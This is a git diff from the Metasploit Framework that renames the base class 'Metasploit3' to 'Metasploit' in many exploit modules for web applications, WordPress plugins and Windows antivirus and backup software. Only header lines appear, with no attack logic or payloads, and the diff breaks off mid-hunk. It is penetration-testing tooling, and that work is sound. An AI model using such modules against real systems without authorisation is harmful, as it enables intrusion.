ac13d101db..d019189c3d 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 0e2e00d06c..07513662ce 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index c371316749..e76f98f19a 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 95ed12f2fe..eecfff14d2 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 373ad569cc..b5be678fc0 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 45c8bbe1cf..0adb3fc0b6 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 1579b33cc9..31be728993 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 5817ebf9d4..74ce604dd9 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 1ab30f176f..c8c7a22ffc 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 008317ea7f..fb7e3204d0 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 06b6f4b909..56bff267ba 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index dc6b8ca785..86c69774f7 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f86704f106..a22120a2d2 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index ced2ed7f8c..1051cdd827 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 39b948f6d9..2141bf8a03 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 10b9d39bbd..5a3a61725b 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 525d1dfce9..afe808253d 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index f7e59f655a..377a09d3b0 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbmysql' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 26b36e5d62..4ce46a4946 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index cacccd0f7d..5014e957be 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 99deba5747..7364c0433c 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index f807f9e58c..f666c8faeb 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 485c58a950..224f7b77db 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index 2fc0fe33ca..324432c0ce 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index cbc7e40b53..86d364a719 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 00226d4e6b..f815ba90cc 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 2321cede00..75a6f808f7 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 3e83952a77..66d0bfa925 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 564aaead50..41402bafef 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 5e229750e1..e00e0ae422 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index 830cb7cea6..c58b5bd600 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index 6b7a2c30b9..97f22cd70c 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index bcf6911d2b..e503dec2e8 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index ff0f1b3644..ecddf6bb84 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index f4cd2947c3..847e8264a4 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index b9077a1de7..b8bd7ad5e0 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e12dd578c5..2e87905569 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 1a4f6f9ab5..f28c89a489 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 6af43f873a..f3e2c9315c 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index 0cb88957e1..e25b11491e 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 8f26104b4e..f882efcdd6 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index fa69d395d3..f96bfc248b 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/x11/x11_keyboard_exec.rb b/modules/exploits/unix/x11/x11_keyboard_exec.rb index 00ba8cad4b..612c0b1995 100644 --- a/modules/exploits/unix/x11/x11_keyboard_exec.rb +++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index efed29d6fa..9166e0bda0 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 7088c01e04..df8e63e783 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index 376be876bb..a74d120f22 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 48b9a23fb3..3a33e4fdac 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index d766eb6294..997428c9a0 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 5822a09417..039c62f8d4 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 96d629dcf2..68d8d930cd 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 026513e734..10a13c45eb 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index ef09da8928..d09010ab74 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index d1c08fd8c3..4a698064e1 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index a6eb07f123..02e6225907 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 8670ef8c98..582a75bf77 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 13431a8ea1..41e2779344 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 0ac6087379..0f1528d5b8 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 8145935ad9..4072989392 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index bfe484f24f..5a0796278b 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index 61ae466927..c3fa9c5dc1 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index ade7cf8ecf..f3cf15b197 100644 --- 